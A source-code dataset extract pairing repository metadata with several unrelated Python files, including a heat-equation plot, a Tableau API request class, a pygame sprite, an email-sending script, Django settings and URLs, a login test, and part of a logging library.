| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
76ebcd294c425806f2a19ba5ab050dfad80e8987
| 826
|
py
|
Python
|
trabalho-numerico/tridimensional.py
|
heissonwillen/tcm
|
71da46489f12e64b50436b17447721cb8f7eaf09
|
[
"MIT"
] | null | null | null |
trabalho-numerico/tridimensional.py
|
heissonwillen/tcm
|
71da46489f12e64b50436b17447721cb8f7eaf09
|
[
"MIT"
] | null | null | null |
trabalho-numerico/tridimensional.py
|
heissonwillen/tcm
|
71da46489f12e64b50436b17447721cb8f7eaf09
|
[
"MIT"
] | null | null | null |
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
from matplotlib import cm
import numpy as np
import os
import contorno
from constantes import INTERVALOS, PASSOS, TAMANHO_BARRA, DELTA_T, DELTA_X
z_temp = contorno.p_3
TAMANHO_BARRA = 2
x = np.linspace(0.0, TAMANHO_BARRA, INTERVALOS+1)
y = np.linspace(0.0, DELTA_T, PASSOS+1)
z = []
for k in range(PASSOS+1):
z_k = np.copy(z_temp)
z.append(z_k)
for i in range(1, INTERVALOS):
z_temp[i] = z_k[i] + (DELTA_T/(DELTA_X**2)) * (z_k[i+1]-2*z_k[i]+z_k[i-1])
z = np.asarray(z)
x, y = np.meshgrid(x, y)
fig = plt.figure()
ax = fig.gca(projection='3d')
surf = ax.plot_surface(x, y, z, cmap=cm.coolwarm, antialiased=False)
ax.set_xlabel('x')
ax.set_ylabel('t')
ax.set_zlabel('T(x,t)')
fig.colorbar(surf, shrink=0.5, aspect=5)
plt.show()
| 22.944444
| 82
| 0.692494
| 160
| 826
| 3.43125
| 0.39375
| 0.021858
| 0.021858
| 0.043716
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02845
| 0.14891
| 826
| 35
| 83
| 23.6
| 0.752489
| 0
| 0
| 0
| 0
| 0
| 0.012107
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.111111
| 0.259259
| 0
| 0.259259
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0a03cda07d112635217a5bbdc7ec5274c0658a7a
| 3,258
|
py
|
Python
|
requests/UpdateWorkbookConnectionRequest.py
|
divinorum-webb/python-tableau-api
|
9d3f130d63b15307ad2b23e2273b52790b8d9018
|
[
"Apache-2.0"
] | 1
|
2019-06-08T22:19:40.000Z
|
2019-06-08T22:19:40.000Z
|
requests/UpdateWorkbookConnectionRequest.py
|
divinorum-webb/python-tableau-api
|
9d3f130d63b15307ad2b23e2273b52790b8d9018
|
[
"Apache-2.0"
] | null | null | null |
requests/UpdateWorkbookConnectionRequest.py
|
divinorum-webb/python-tableau-api
|
9d3f130d63b15307ad2b23e2273b52790b8d9018
|
[
"Apache-2.0"
] | null | null | null |
from .BaseRequest import BaseRequest
class UpdateWorkbookConnectionRequest(BaseRequest):
    """
    Update workbook connection request for sending API requests to Tableau Server.

    :param ts_connection:         The Tableau Server connection object.
    :type ts_connection:          class
    :param server_address:        The new server for the connection.
    :type server_address:         string
    :param port:                  The new port for the connection.
    :type port:                   string
    :param connection_username:   The new username for the connection.
    :type connection_username:    string
    :param connection_password:   The new password for the connection.
    :type connection_password:    string
    :param embed_password_flag:   Boolean; True to embed the password in the connection, False otherwise.
    :type embed_password_flag:    boolean
    """
    def __init__(self,
                 ts_connection,
                 server_address=None,
                 port=None,
                 connection_username=None,
                 connection_password=None,
                 embed_password_flag=None):
        super().__init__(ts_connection)
        self._server_address = server_address
        self._port = port
        self._connection_username = connection_username
        self._connection_password = connection_password
        self._embed_password_flag = embed_password_flag
        # Touch the property so the base 'connection' element exists up front.
        self.base_update_workbook_connection_request

    @property
    def optional_parameter_keys(self):
        # XML/JSON attribute names expected by the Tableau REST API.
        return [
            'serverAddress',
            'serverPort',
            'userName',
            'password',
            'embedPassword'
        ]

    @property
    def optional_parameter_values_exist(self):
        # Mirrors optional_parameter_values, except the embed flag maps to
        # True whenever it was provided at all (even if it was set to False),
        # so that an explicit False still counts as "present".
        return [
            self._server_address,
            self._port,
            self._connection_username,
            self._connection_password,
            None if self._embed_password_flag is None else True
        ]

    @property
    def optional_parameter_values(self):
        return [
            self._server_address,
            self._port,
            self._connection_username,
            self._connection_password,
            self._embed_password_flag
        ]

    @property
    def base_update_workbook_connection_request(self):
        # Seed the request body with an empty 'connection' element.
        self._request_body.update({'connection': {}})
        return self._request_body

    @property
    def modified_update_workbook_connection_request(self):
        # Only touch the body when at least one optional value was supplied.
        if any(self.optional_parameter_values_exist):
            connection_params = self._get_parameters_dict(
                self.optional_parameter_keys,
                self.optional_parameter_values)
            self._request_body['connection'].update(connection_params)
        return self._request_body

    @staticmethod
    def _get_parameters_dict(param_keys, param_values):
        """Override the inherited _get_parameters_dict() method to allow passing boolean values directly"""
        return {key: value
                for key, value in zip(param_keys, param_values)
                if value is not None}

    def get_request(self):
        return self.modified_update_workbook_connection_request
| 36.2
| 107
| 0.634131
| 331
| 3,258
| 5.885196
| 0.214502
| 0.046715
| 0.061088
| 0.079569
| 0.297228
| 0.11191
| 0.081109
| 0.081109
| 0.081109
| 0.081109
| 0
| 0
| 0.305402
| 3,258
| 89
| 108
| 36.606742
| 0.860804
| 0.261203
| 0
| 0.285714
| 0
| 0
| 0.030796
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.126984
| false
| 0.15873
| 0.015873
| 0.063492
| 0.269841
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0a1cc533cda21da8b86ba8309652b8179ef12637
| 1,371
|
py
|
Python
|
Episode11-Menu/Pygame/explosion.py
|
Inksaver/Shmup_With_Pygame_Love2D_Monogame
|
84838516d9dd9d6639b1b699dca546bfdfec73dc
|
[
"CC0-1.0"
] | 1
|
2022-02-01T04:05:04.000Z
|
2022-02-01T04:05:04.000Z
|
Episode11-Menu/Pygame/explosion.py
|
Inksaver/Shmup_With_Pygame_Love2D_Monogame
|
84838516d9dd9d6639b1b699dca546bfdfec73dc
|
[
"CC0-1.0"
] | null | null | null |
Episode11-Menu/Pygame/explosion.py
|
Inksaver/Shmup_With_Pygame_Love2D_Monogame
|
84838516d9dd9d6639b1b699dca546bfdfec73dc
|
[
"CC0-1.0"
] | null | null | null |
import pygame
import shared
class Explosion():
    """Animated explosion sprite played once at a fixed centre position."""

    def __init__(self, images: dict, centre: tuple, key: str) -> None:
        """Class variables.

        :param images: dict mapping a size key to a list of animation frames;
                       keys: 'sm', 'lg', 'player'.
                       (The original annotated this as ``list``, but it is
                       indexed as ``images[key][0]`` — it must be a dict.)
        :param centre: (x, y) centre shared by every frame.
        :param key: which frame sequence from *images* to play.
        """
        self.images = images                # dict of frame lists, keyed by size
        self.centre = centre                # use for all frames
        self.key = key                      # key used later
        self.image = images[key][0]         # set to first image in the sequence
        self.rect = self.image.get_rect()   # define rectangle from image size
        self.rect.center = self.centre      # set centre for all frames
        self.frame = 0                      # index of the current frame
        self.time_passed = 0                # set timer to 0
        self.frame_rate = 0.1               # 8 images at 1 frame per 0.1 secs = 0.8 seconds
        self.active = True

    def update(self, dt):
        """Advance the animation by *dt* seconds; return False once finished."""
        self.time_passed += dt
        if self.time_passed >= self.frame_rate:     # 0.1 seconds has passed
            self.time_passed = 0                    # reset timer
            self.frame += 1                         # increase frame number
            if self.frame >= len(self.images[self.key]):    # end of list?
                self.active = False                 # animation finished
            else:
                self.image = self.images[self.key][self.frame]  # next frame
                self.rect = self.image.get_rect()   # new rectangle
                self.rect.center = self.centre      # set centre to parameter value
        return self.active

    def draw(self):
        """Blit the current frame onto the shared screen surface."""
        shared.screen.blit(self.image, self.rect)   # draw current frame
| 41.545455
| 84
| 0.644055
| 206
| 1,371
| 4.228155
| 0.383495
| 0.061998
| 0.064294
| 0.036739
| 0.165327
| 0.130884
| 0.075775
| 0
| 0
| 0
| 0
| 0.016569
| 0.251641
| 1,371
| 33
| 85
| 41.545455
| 0.832359
| 0.326039
| 0
| 0.214286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.107143
| false
| 0.142857
| 0.071429
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0a2ad964a50ee086e447a623b3863c7fbb9ef26a
| 1,977
|
py
|
Python
|
src/com/python/email/send_mail.py
|
Leeo1124/pythonDemo
|
72e2209c095301a3f1f61edfe03ea69c3c05be40
|
[
"Apache-2.0"
] | null | null | null |
src/com/python/email/send_mail.py
|
Leeo1124/pythonDemo
|
72e2209c095301a3f1f61edfe03ea69c3c05be40
|
[
"Apache-2.0"
] | null | null | null |
src/com/python/email/send_mail.py
|
Leeo1124/pythonDemo
|
72e2209c095301a3f1f61edfe03ea69c3c05be40
|
[
"Apache-2.0"
] | null | null | null |
'''
Created on 2016-08-10

@author: Administrator

Send an email with a text body and an image attachment through SMTP.
'''
from email import encoders
from email.header import Header
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
# MIMEBase lives in email.mime.base; importing it from email.mime.multipart
# only worked by accident (that module re-imports it internally).
from email.mime.base import MIMEBase
from email.utils import parseaddr, formataddr
import smtplib


def _format_addr(s):
    """Format a 'Name <addr>' header, RFC 2047-encoding a non-ASCII name."""
    name, addr = parseaddr(s)
    return formataddr((Header(name, 'utf-8').encode(), addr))


from_addr = 'leeo1124@163.com'  # input('From: ')
password = input('Password: ')
to_addr = '450475851@qq.com'  # input('To: ')
smtp_server = 'smtp.163.com'  # input('SMTP server: ')

# Plain-text message:
# msg = MIMEText('hello, send by Python...', 'plain', 'utf-8')
# HTML message:
# msg = MIMEText('<html><body><h1>Hello</h1>' +
#     '<p>send by <a href="http://www.python.org">Python</a>...</p>' +
#     '</body></html>', 'html', 'utf-8')

# Message with an attachment.
# The message object:
msg = MIMEMultipart()
msg['From'] = _format_addr('Python爱好者 <%s>' % from_addr)
msg['To'] = _format_addr('管理员 <%s>' % to_addr)
msg['Subject'] = Header('来自SMTP的问候……', 'utf-8').encode()
# The message body is a MIMEText part:
msg.attach(MIMEText('send with file...', 'plain', 'utf-8'))
# Adding an attachment means adding a MIMEBase part read from a local file:
with open('D:/pythonWorkspace/pthonDemo/src/com/python/email/test.jpg', 'rb') as f:
    # Set the attachment's MIME type and filename (png here):
    mime = MIMEBase('image', 'png', filename='test.png')
    # Add the required headers:
    mime.add_header('Content-Disposition', 'attachment', filename='test.png')
    mime.add_header('Content-ID', '<0>')
    mime.add_header('X-Attachment-Id', '0')
    # Read in the attachment content:
    mime.set_payload(f.read())
    # Base64-encode it:
    encoders.encode_base64(mime)
    # Attach it to the MIMEMultipart:
    msg.attach(mime)

# NOTE: the original script assigned msg['From'], msg['To'] and msg['Subject']
# a second time at this point.  email.message.Message.__setitem__ APPENDS
# headers rather than replacing them, so the message went out with duplicate
# From/To/Subject headers.  The redundant assignments have been removed.

server = smtplib.SMTP(smtp_server, 25)
server.set_debuglevel(1)
server.login(from_addr, password)
server.sendmail(from_addr, [to_addr], msg.as_string())
server.quit()
| 29.073529
| 83
| 0.676277
| 267
| 1,977
| 4.947566
| 0.397004
| 0.040878
| 0.029523
| 0.033308
| 0.195307
| 0.152914
| 0.152914
| 0.152914
| 0.152914
| 0.152914
| 0
| 0.025015
| 0.130501
| 1,977
| 68
| 84
| 29.073529
| 0.736475
| 0.233687
| 0
| 0.171429
| 0
| 0
| 0.221328
| 0.0389
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028571
| false
| 0.057143
| 0.2
| 0
| 0.257143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0a4ab6a6c7a8f22ae4262d99f43041e035e6b535
| 602
|
py
|
Python
|
project/settings/production.py
|
chiehtu/kissaten
|
a7aad01de569107d5fd5ed2cd781bca6e5750871
|
[
"MIT"
] | null | null | null |
project/settings/production.py
|
chiehtu/kissaten
|
a7aad01de569107d5fd5ed2cd781bca6e5750871
|
[
"MIT"
] | null | null | null |
project/settings/production.py
|
chiehtu/kissaten
|
a7aad01de569107d5fd5ed2cd781bca6e5750871
|
[
"MIT"
] | null | null | null |
from .base import *

# Production overrides for the base Django settings.

# Pull the secret key from the environment so it never lands in VCS.
SECRET_KEY = get_env_var('SECRET_KEY')

# Only send CSRF and session cookies over HTTPS.
CSRF_COOKIE_SECURE = True
SESSION_COOKIE_SECURE = True

# Wrap the standard loaders in the cached loader so templates are compiled once.
TEMPLATE_LOADERS = (
    ('django.template.loaders.cached.Loader', (
        'django.template.loaders.filesystem.Loader',
        'django.template.loaders.app_directories.Loader',
    )),
)

# Outgoing mail goes through Gmail's SMTP server over TLS (port 587);
# credentials come from the environment.
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_HOST_USER = get_env_var('EMAIL_HOST_USER')
EMAIL_HOST_PASSWORD = get_env_var('EMAIL_HOST_PASSWORD')
EMAIL_PORT = 587
EMAIL_USE_TLS = True
DEFAULT_FROM_EMAIL = ''

# Force HTTPS in userena-generated URLs.
USERENA_USE_HTTPS = True
| 18.8125
| 61
| 0.750831
| 81
| 602
| 5.197531
| 0.493827
| 0.106888
| 0.064133
| 0.128266
| 0.085511
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00578
| 0.137874
| 602
| 31
| 62
| 19.419355
| 0.805395
| 0
| 0
| 0
| 0
| 0
| 0.373754
| 0.277409
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.055556
| 0.055556
| 0
| 0.055556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0a61c9cfc48e56723e2d98bba70acd01045f443c
| 1,357
|
py
|
Python
|
cv_recommender/account/urls.py
|
hhhameem/CV-Recommender
|
b85d53934f0d888835ab8201be388d7d69f0693d
|
[
"MIT"
] | 1
|
2021-09-14T17:40:17.000Z
|
2021-09-14T17:40:17.000Z
|
cv_recommender/account/urls.py
|
mjohra/Cv-Recommender-Python-Django
|
d231092f7bd989b513210dd6031fb23e28bd5dfe
|
[
"MIT"
] | 1
|
2021-03-31T17:45:15.000Z
|
2021-03-31T17:45:15.000Z
|
cv_recommender/account/urls.py
|
mjohra/Cv-Recommender-Python-Django
|
d231092f7bd989b513210dd6031fb23e28bd5dfe
|
[
"MIT"
] | 1
|
2021-03-31T16:58:50.000Z
|
2021-03-31T16:58:50.000Z
|
from django.urls import path
from django.contrib.auth import views as auth_views

from . import views

# Account URL configuration: registration and session handling, Django's
# built-in password-change / password-reset flows, and the applicant /
# recruiter dashboards with their profile-edit pages.
urlpatterns = [
    # Registration and session management (custom views).
    path('register/', views.register, name='register'),
    path('login/', views.userlogin, name='login'),
    path('logout/', views.userlogout, name='logout'),
    # Password change flow (built-in class-based auth views).
    path('password_change/', auth_views.PasswordChangeView.as_view(),
         name='password_change'),
    path('password_change/done/', auth_views.PasswordChangeDoneView.as_view(),
         name='password_change_done'),
    # Password reset flow (email-based, built-in auth views).
    path('password_reset/', auth_views.PasswordResetView.as_view(),
         name='password_reset'),
    path('password_reset/done/', auth_views.PasswordResetDoneView.as_view(),
         name='password_reset_done'),
    path('reset/<uidb64>/<token>/', auth_views.PasswordResetConfirmView.as_view(),
         name='password_reset_confirm'),
    path('reset/done/', auth_views.PasswordResetCompleteView.as_view(),
         name='password_reset_complete'),
    # Role-specific dashboards and profile editing.
    path('applicantdashboard/', views.applicantdashboard,
         name='applicantdashboard'),
    path('recruiterdashboard/', views.recruiterdashboard,
         name='recruiterdashboard'),
    path('applicantdashboard/profile-edit/', views.applicantedit,
         name='editapplicantprofile'),
    path('recruiterdashboard/profile-edit/', views.recruiteredit,
         name='editrecruiterprofile'),
]
| 45.233333
| 82
| 0.709654
| 137
| 1,357
| 6.832117
| 0.284672
| 0.067308
| 0.064103
| 0.115385
| 0.149573
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001729
| 0.147384
| 1,357
| 29
| 83
| 46.793103
| 0.80726
| 0
| 0
| 0
| 0
| 0
| 0.322771
| 0.112749
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.428571
| 0.107143
| 0
| 0.107143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6a6b124cb7b2cd1d6d09ae5b84d5b49e63612508
| 679
|
py
|
Python
|
test_f_login_andy.py
|
KotoLLC/peacenik-tests
|
760f7799ab2b9312fe0cce373890195151c48fce
|
[
"Apache-2.0"
] | null | null | null |
test_f_login_andy.py
|
KotoLLC/peacenik-tests
|
760f7799ab2b9312fe0cce373890195151c48fce
|
[
"Apache-2.0"
] | null | null | null |
test_f_login_andy.py
|
KotoLLC/peacenik-tests
|
760f7799ab2b9312fe0cce373890195151c48fce
|
[
"Apache-2.0"
] | null | null | null |
from helpers import *
def test_f_login_andy():
    """Log in as user 'andy' via the auth RPC and expect HTTP 200."""
    endpoint = "http://central.orbits.local/rpc.AuthService/Login"
    credentials = {"name": "andy", "password": "12345"}
    request_headers = {'Content-Type': 'application/json'}
    # The body must be a JSON string, so serialize the credentials dict.
    response = requests.request("POST", endpoint, headers=request_headers,
                                data=json.dumps(credentials))
    save_cookies(response.cookies, "cookies.txt")
    # Validate response headers and body contents, e.g. status code.
    assert response.status_code == 200
    # Dump the full request and response for debugging.
    pretty_print_request(response.request)
    pretty_print_response(response)
| 35.736842
| 75
| 0.696613
| 86
| 679
| 5.372093
| 0.604651
| 0.04329
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014467
| 0.185567
| 679
| 19
| 76
| 35.736842
| 0.820976
| 0.216495
| 0
| 0
| 0
| 0
| 0.213611
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 1
| 0.090909
| false
| 0.090909
| 0.090909
| 0
| 0.181818
| 0.181818
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6a78c857a857449cf31704c6af0759d610215a2d
| 25,852
|
py
|
Python
|
pypyrus_logbook/logger.py
|
t3eHawk/pypyrus_logbook
|
bd647a1c355b07e8df28c0d7298fcfe68cd9572e
|
[
"MIT"
] | null | null | null |
pypyrus_logbook/logger.py
|
t3eHawk/pypyrus_logbook
|
bd647a1c355b07e8df28c0d7298fcfe68cd9572e
|
[
"MIT"
] | null | null | null |
pypyrus_logbook/logger.py
|
t3eHawk/pypyrus_logbook
|
bd647a1c355b07e8df28c0d7298fcfe68cd9572e
|
[
"MIT"
] | 2
|
2019-02-06T08:05:43.000Z
|
2019-02-06T08:06:35.000Z
|
import atexit
import datetime as dt
import os
import platform
import pypyrus_logbook as logbook
import sys
import time
import traceback
from .conf import all_loggers
from .formatter import Formatter
from .header import Header
from .output import Root
from .record import Record
from .sysinfo import Sysinfo
class Logger():
"""This class represents a single logger.
Logger by it self is a complex set of methods, items and commands that
together gives funcionality for advanced logging in different outputs:
console, file, email, database table, HTML document - and using information
from diffrent inputs: user messages, traceback, frames, user parameters,
execution arguments and systems descriptors.
Each logger must have an unique name which will help to identify it.
Main application logger will have the same name as a python script file.
It can be accessed by native logbook methods or by calling `getlogger()`
method with no name.
Parameters
----------
name : str, optional
The argument is used te define `name` attribute
app : str, optional
The argument is used to set the `app` attribute.
desc : str, optional
The argument is used to set the `desc` attribute.
version : str, optional
The argument is used to set the `version` attribute.
status : bool, optional
The argument is used to open or close output `root`.
console : bool, optional
The argument is used to open or close output `console`.
file : bool, optional
The argument is used to open or close output `file`.
email : bool, optional
The argument is used to open or close output `email`.
html : bool, optional
The argument is used to open or close output `html`.
table : bool, optional
The argument is used to open or close output `table`.
directory : str, optional
The argument is used to set logging file folder.
filename : str, optional
The argument is used to set logging file name.
extension : str, optional
The argument is used to set logging file extension.
smtp : dict, optional
The argument is used to configure SMTP connection.
db : dict, optional
The argument is used to configure DB connection.
format : str, optional
The argument is used to set record template.
info : bool, optional
The argument is used to filter info records. The default is True.
debug : bool, optional
The argument is used to filter debug records. The default is False.
warning : bool, optional
The argument is used to filter warning records. The default is True.
error : bool, optional
The argument is used to filter error records. The default is True.
critical : bool, optional
The argument is used to filter critical records. The default is True.
alarming : bool, optional
The argument is used to enable or disable alarming mechanism. The
default is True.
control : bool, optional
The argument is used to enable or disable execution break in case
on error. The default is True.
maxsize : int or bool, optional
The argument is used to define maximum size of output file. Must be
presented as number of bytes. The default is 10 Mb.
maxdays : int or bool, optional
The argument is used to define maximum number of days that will be
logged to same file. The default is 1 which means that new output file
will be opened at each 00:00:00.
maxlevel : int or bool, optional
The argument is used to define the break error level (WARNING = 0,
ERRROR = 1, CRITICAL = 2). All that higher the break level will
interrupt application execution. The default is 1.
maxerrors : int or bool, optional
The argument is used to define maximun number of errors. The default
is False which means it is disabled.
Attributes
----------
name : str
Name of the logger.
app : str
Name of the application that we are logging.
desc : str
Description of the application that we are logging.
version : str
Version of the application that we are logging.
start_date : datetime.datetime
Date when logging was started.
rectypes : dict
All available record types. Keys are used in `Logger` write methods as
`rectype` argument. Values are used in formatting. So if you wish to
modify `rectype` form then edit appropriate one here. If you wish to
use own record types then just add it to that dictinary. By default we
provide the next few record types:
+---------+---------+
| Key | Value |
+=========+=========+
|none |NONE |
+---------+---------+
|info |INFO |
+---------+---------+
|debug |DEBUG |
+---------+---------+
|warning |WARNING |
+---------+---------+
|error |ERROR |
+---------+---------+
|critical |CRITICAL |
+---------+---------+
messages : dict
Messages that are printed with some `Logger` methods like `ok()`,
`success()`, `fail()`. If you wish to modify the text of this messages
just edit the value of appropriate item.
with_errors : int
The flag shows that logger catched errors in the application during its
execution.
count_errors : int
Number of errors that logger catched in the application during its
execution.
filters : dict
Record types filters. To filter record type just set corresponding
item value to False.
root : pypyrus_logbook.output.Root
The output `Root` object.
console : pypyrus_logbook.output.Console
The output `Console` object. Shortcut for `Logger.root.console`.
file : pypyrus_logbook.output.File
The output file. Shortcut for `Logger.output.file`.
email : pypyrus_logbook.output.Email
The output email. Shortcut for `Logger.output.email`.
html: pypyrus_logbook.output.HTML
The output HTML document. Shortcut for `Logger.output.html`.
table: pypyrus_logbook.output.Table
The output table. Shortcut for `Logger.output.table`.
formatter : pypyrus_logbook.formatter.Formatter
Logger formatter which sets all formatting configuration like
record template, error message template, line length etc.
sysinfo : pypyrus_logbook.sysinfo.Sysinfo
Special input object which parse different inputs includeing system
specifications, flag arguments, execution parameters, user parameters
and environment variables and transforms all of that to `Dataset`
object. Through the `Dataset` object data can be easily accessed by
get item operation or by point like `sysinfo.desc['hostname']` or
`sysinfo.desc.hostname`.
header : pypyrus_logbook.header.Header
The header that can be printed to the writable output.
"""
def __init__(self, name=None, app=None, desc=None, version=None,
status=True, console=True, file=True, email=False, html=False,
table=False, directory=None, filename=None, extension=None,
smtp=None, db=None, format=None, info=True, debug=False,
warning=True, error=True, critical=True, alarming=True,
control=True, maxsize=(1024*1024*10), maxdays=1, maxlevel=2,
maxerrors=False):
# Unique name of the logger.
self._name = name
# Attributes describing the application.
self.app = None
self.desc = None
self.version = None
# Some logger important attributes
self._start_date = dt.datetime.now()
self.rectypes = {'none': 'NONE', 'info': 'INFO', 'debug': 'DEBUG',
'warning': 'WARNING', 'error': 'ERROR',
'critical': 'CRITICAL'}
self.messages = {'ok': 'OK', 'success': 'SUCCESS', 'fail': 'FAIL'}
self._with_error = False
self._count_errors = 0
# Complete the initial configuration.
self.configure(app=app, desc=desc, version=version, status=status,
console=console, file=file, email=email, html=html,
table=table, directory=directory, filename=filename,
extension=extension, smtp=smtp, db=db, format=format,
info=info, debug=debug, warning=warning, error=error,
critical=critical, alarming=alarming, control=control,
maxsize=maxsize, maxdays=maxdays, maxlevel=maxlevel,
maxerrors=maxerrors)
# Output shortcuts.
self.console = self.root.console
self.file = self.root.file
self.email = self.root.email
self.html = self.root.html
self.table = self.root.table
# Set exit function.
atexit.register(self._exit)
# Add creating logger to special all_loggers dictinary.
all_loggers[self._name] = self
pass
def __str__(self):
return f'<Logger object "{self._name}">'
__repr__ = __str__
@property
def name(self):
"""Unique logger name."""
return self._name
@property
def start_date(self):
"""Logging start date."""
return self._start_date
@property
def with_error(self):
"""Flag that shows was an error or not."""
return self._with_error
@property
def count_errors(self):
"""The number of occured errors."""
return self._count_errors
def configure(self, app=None, desc=None, version=None, status=None,
console=None, file=None, email=None, html=None, table=None,
directory=None, filename=None, extension=None, smtp=None,
db=None, format=None, info=None, debug=None, warning=None,
error=None, critical=None, alarming=None, control=None,
maxsize=None, maxdays=None, maxlevel=None, maxerrors=None):
"""Main method to configure the logger and all its attributes.
This is an only one right way to customize logger. Parameters are the
same as for creatrion.
Parameters
----------
app : str, optional
The argument is used to set the `app` attribute.
desc : str, optional
The argument is used to set the `desc` attribute.
version : str, optional
The argument is used to set the `version` attribute.
status : bool, optional
The argument is used to open or close output `root`.
console : bool, optional
The argument is used to open or close output `console`.
file : bool, optional
The argument is used to open or close output `file`.
email : bool, optional
The argument is used to open or close output `email`.
html : bool, optional
The argument is used to open or close output `html`.
table : bool, optional
The argument is used to open or close output `table`.
directory : str, optional
The argument is used to set logging file folder.
filename : str, optional
The argument is used to set logging file name.
extension : str, optional
The argument is used to set logging file extension.
smtp : dict, optional
The argument is used to configure SMTP connection.
db : dict, optional
The argument is used to configure DB connection.
format : str, optional
The argument is used to set record template.
info : bool, optional
The argument is used to filter info records.
debug : bool, optional
The argument is used to filter debug records.
warning : bool, optional
The argument is used to filter warning records.
error : bool, optional
The argument is used to filter error records.
critical : bool, optional
The argument is used to filter critical records.
alarming : bool, optional
The argument is used to enable or disable alarming mechanism.
control : bool, optional
The argument is used to enable or disable execution break in case
on error.
maxsize : int or bool, optional
The argument is used to define maximum size of output file.
maxdays : int or bool, optional
The argument is used to define maximum number of days that will be
logged to same file.
maxlevel : int or bool, optional
The argument is used to define the break error level.
maxerrors : int or bool, optional
The argument is used to define maximun number of errors.
"""
if isinstance(app, str) is True: self.app = app
if isinstance(desc, str) is True: self.desc = desc
if isinstance(version, (str, int, float)) is True:
self.version = version
# Build the output root if it is not exists. In other case modify
# existing output if it is requested.
if hasattr(self, 'root') is False:
self.root = Root(self, console=console, file=file, email=email,
html=html, table=table, status=status,
directory=directory, filename=filename,
extension=extension, smtp=smtp, db=db)
else:
for key, value in {'console': console, 'file': file,
'email': email, 'html': html,
'table': table}.items():
if value is True:
getattr(self.root, key).open()
if key == 'file':
getattr(self.root, key).new()
elif value is False:
getattr(self.root, key).close()
# Customize output file path.
path = {}
if directory is not None: path['dir'] = directory
if filename is not None: path['name'] = filename
if extension is not None: path['ext'] = extension
if len(path) > 0:
self.root.file.configure(**path)
# Customize SMTP server.
if isinstance(smtp, dict) is True:
self.root.email.configure(**smtp)
# Customize database connection.
if isinstance(db, dict) is True:
self.root.table.configure(**db)
# Create formatter in case it is not exists yet or just customize it.
# Parameter format can be either string or dictionary.
# When it is string then it must describe records format.
# When it is dictionary it can contaion any parameter of formatter
# that must be customized.
if isinstance(format, str) is True:
format = {'record': format}
if hasattr(self, 'formatter') is False:
format = {} if isinstance(format, dict) is False else format
self.formatter = Formatter(**format)
elif isinstance(format, dict) is True:
self.formatter.configure(**format)
# Create or customize record type filters.
if hasattr(self, 'filters') is False:
self.filters = {}
for key, value in {'info': info, 'debug': debug, 'error': error,
'warning': warning, 'critical': critical}.items():
if isinstance(value, bool) is True:
self.filters[key] = value
# Customize limits and parameters of execution behaviour.
if isinstance(maxsize, (int, float, bool)) is True:
self._maxsize = maxsize
if isinstance(maxdays, (int, float, bool)) is True:
self._maxdays = maxdays
self.__calculate_restart_date()
if isinstance(maxlevel, (int, float, bool)) is True:
self._maxlevel = maxlevel
if isinstance(maxerrors, (int, float, bool)) is True:
self._maxerrors = maxerrors
if isinstance(alarming, bool) is True:
self._alarming = alarming
if isinstance(control, bool) is True:
self._control = control
# Initialize sysinfo instance when not exists.
